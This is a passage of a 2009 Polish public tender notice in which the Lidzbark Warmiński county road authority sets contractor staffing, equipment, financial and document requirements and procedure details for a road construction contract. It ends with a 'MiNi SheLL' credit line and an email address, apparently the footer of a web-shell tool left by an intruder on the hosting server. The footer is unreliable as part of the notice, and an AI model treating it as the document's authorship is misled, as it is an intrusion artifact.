a)	wskaże do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby  wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności:
	Przedstawiciel Wykonawcy (kierownik Kontraktu) - posiadającej wyższe wykształcenie, co najmniej 5 lat doświadczenia zawodowego przy realizacji inwestycji budowlanych, przy czym co najmniej jeden kontrakt w zakresie inżynierii komunikacyjnej zakończony i rozliczony według procedur FIDIC lub równoważnych (doprowadzony do wystawienia Świadectwa Przejęcia) o wartości robót brutto co najmniej 10,0 mln. PLN, posiadającej znajomość języka polskiego w stopniu umożliwiającym swobodne porozumiewanie się w mowie i piśmie. W zakresie wymogu znajomości języka dopuszcza się zmianę tego warunku na zatrudnienie na własny koszt przez Wykonawcę tłumacza języka polskiego, zapewniającego stałe i biegłe tłumaczenie w kontaktach między Zamawiającym a Kierownikiem Kontraktu,
Co najmniej 2 lata z powyższego doświadczenia  dotyczyć muszą projektów inwestycyjnych wg        międzynarodowych standardów kontraktów budowlanych typu FIDIC, NEC ECC - na 	stanowiskach Dyrektor Kontraktu, Kierownik Budowy lub równorzędnych.
	co najmniej 1 osoby na stanowisku Kierownik Budowy, posiadającej uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane, przynależącej do Okręgowej Izby Inżynierów Budownictwa, posiadającej co najmniej 5 letnie doświadczenie zawodowe na stanowisku kierownika budowy lub kierownika robót  inwestycji drogowo - mostowych , liczone od momentu uzyskania uprawnień, przy czym co najmniej jeden kontrakt zakończony i rozliczony (doprowadzony do wystawienia Świadectwa Przejęcia), o wartości robót  brutto co najmniej 7,0 mln. PLN. 
     Co najmniej rok z powyższego doświadczenia  dotyczyć musi projektów inwestycyjnych wg        międzynarodowych standardów kontraktów budowlanych typu FIDIC, NEC ECC - na 	stanowiskach  Kierownik Budowy, Kierownika robót  lub równorzędnych.
          co najmniej 1 osoby na stanowisku Kierownik Robót mostowych, posiadającej uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowo - mostowej, lub odpowiadające im Ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, przynależącej do Okręgowej Izby Inżynierów Budownictwa, posiadającej co najmniej 5 letnie doświadczenie zawodowe na stanowisku kierownika robót w specjalności drogowo - mostowej , liczone od momentu uzyskania uprawnień, przy czym co najmniej jeden kontrakt zakończony i rozliczony (doprowadzony do wystawienia Świadectwa Przejęcia), o wartości robót brutto co najmniej 2,5 mln. PLN. 

          co najmniej 1 osoby na stanowisku Kierownik Robót Sanitarnych, posiadającej uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, przynależącej do Okręgowej Izby Inżynierów Budownictwa, posiadającej co najmniej 5 letnie doświadczenie zawodowe na stanowisku kierownika robót w specjalności sanitarnej, , liczone od momentu uzyskania uprawnień, w tym uczestniczącej w  realizacji inwestycji drogowych .

           co najmniej 1 osoby na stanowisku Kierownik Robót Elektrycznych, posiadającej uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, przynależącej do Okręgowej Izby Inżynierów Budownictwa, posiadającej co najmniej 5 letnie doświadczenie zawodowe na stanowisku kierownika robót w specjalności elektrycznej, , liczone od momentu uzyskania uprawnień, w tym uczestniczącej w  realizacji inwestycji drogowych .

         co najmniej 1 osoby na stanowisku Inspektora ds. Rozliczeń posiadającej 3-letnie doświadczenie zawodowe w obmiarach i wycenie robót budowlanych, rozliczaniu robót w kontraktach na wykonanie robót wg warunków FIDIC lub innych uznanych międzynarodowych standardów kontraktów obmiarowych.
Co najmniej 2 lata z powyższego doświadczenia obejmować ma pracę na stanowisku samodzielnego inspektora ds. rozliczeń lub równoważnym, w tym przy rozliczaniu co najmniej jednego kontraktu drogowo - mostowego o wartości brutto robót co najmniej 7,0 mln. PLN.  
Dla kontraktów określonych w innych walutach niż PLN należy podać równowartość kontraktu w PLN przeliczoną wg kursu średniego NBP na dzień wystawienia Świadectwa Przejęcia. 
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć: wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami nt. kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej IDW, oraz dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia w tym dokumenty poświadczające posiadanie wymaganych uprawnień budowlanych i aktualne na dzień otwarcia ofert świadectwa przynależności do Okręgowej Izby Inżynierów Budownictwa. Wykonawca może wykazać doświadczenie zawodowe załączając do Oferty proponowany przez Zamawiającego wzór CV według wzoru stanowiącego załącznik nr 3.1. do niniejszej IDW;
b)	wykonał w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie:
-	co najmniej 1 robotę budowlaną, której przedmiotem było wykonanie w oparciu o warunki FIDIC budowy, przebudowy drogi klasy nie niższej niż L (mogą być również zlokalizowane na obszarze zabudowy) o wartości nie mniejszej niż 8,0 mln. PLN. brutto. 
Dla kontraktów określonych w innych walutach niż PLN należy podać równowartość kontraktu w PLN przeliczoną wg kursu średniego NBP na dzień wystawienia Świadectwa Przejęcia. 

W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót budowlanych sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej IDW oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie, 

c) posiada lub ma  dostęp do urządzeń i sprzętu niezbędnego do Wykonania robót tzn.

1.Wytwórnia mas bitumicznych o wydajności minimum 100 Mg na h zlokalizowana w odległości gwarantującej czas transportu spełniający wymagania SST. - Min. Liczba jednostek: 1
2 Układarka do mas bitumicznych szerokości minimum 4 m - min. liczba
jednostek: 1
3 Walec stalowy - min. Liczba jednostek: 2

3)	znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa): 

a)	Wykonawca osiągnął w ostatnich 3 latach obrotowych, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, łącznie przychód netto ze sprzedaży w wysokości co najmniej 5 000 000 zł

W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć rachunek zysków i strat, a w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego inne dokumenty określające przychody - za okres ostatnich 3 lat obrotowych (2006, 2007, 2008), a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
b)	posiadać środki finansowe w wysokości co najmniej 1 500 000,00 zł lub posiadać zdolność kredytową w wysokości co najmniej 1 500 000,00 zł. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, potwierdzającą posiadanie środków finansowych w wymaganej wysokości lub posiadanie przez Wykonawcę zdolności kredytowej w wymaganej wysokości, 
		c) 	posiadać aktualną polisę, a przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 2,5 mln zł.,
4)	złożyć oświadczenie, sporządzone według wzoru stanowiącego załącznik nr 2 do niniejszych IDW, o spełnianiu warunków udziału w postępowaniu (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w/w dokument powinien być złożony oddzielnie przez każdego z Wykonawców składających ofertę wspólną art. 23 ust. 3 ustawy Pzp).
5. Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. (Dz. U. Nr 87, poz. 605 ZE ZM. ) w sprawie rodzaju dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy:
1)	jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej w  pkt. 9.1.1).a), 9.1.1).b) i 9.1.1).d), składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:  
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
b)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2)	jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa powyżej w pkt. 9.1.1).c) - składa oświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
3)	Dokumenty, o których mowa w pkt. 9.2.1).a) i c) oraz 9.2.2), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt. 9.2.1).b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4)	jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej w pkt. 9.2.1) i 9.2.2), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapis pkt. 9.2.3) stosuje się odpowiednio.
b) wykazywanych w walutach obcych do obliczania przychodu, wartości wykonywanych robót, posiadanych środków finansowych lub zdolności kredytowej należy przyjąć średni kurs NBP z dnia ukazania się ogłoszenia w Dzienniku Urzędowym Unii Europejskiej. Przeliczenia dokona Zamawiający.
c) przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia..</li>
</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/powiat_lidzbarski/280/Zarzad_Drog_Powiatowych/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych
Ul. Wyszyńskiego 20, 11-100 Lidzbark Warmiński. Koszt specyfikacji wynosi 3 000 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2009 godzina 10:00, miejsce: Zarząd Dróg Powiatowych, Ul. Wyszyńskiego 20, 11-100 Lidzbark Warmiński pok. 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com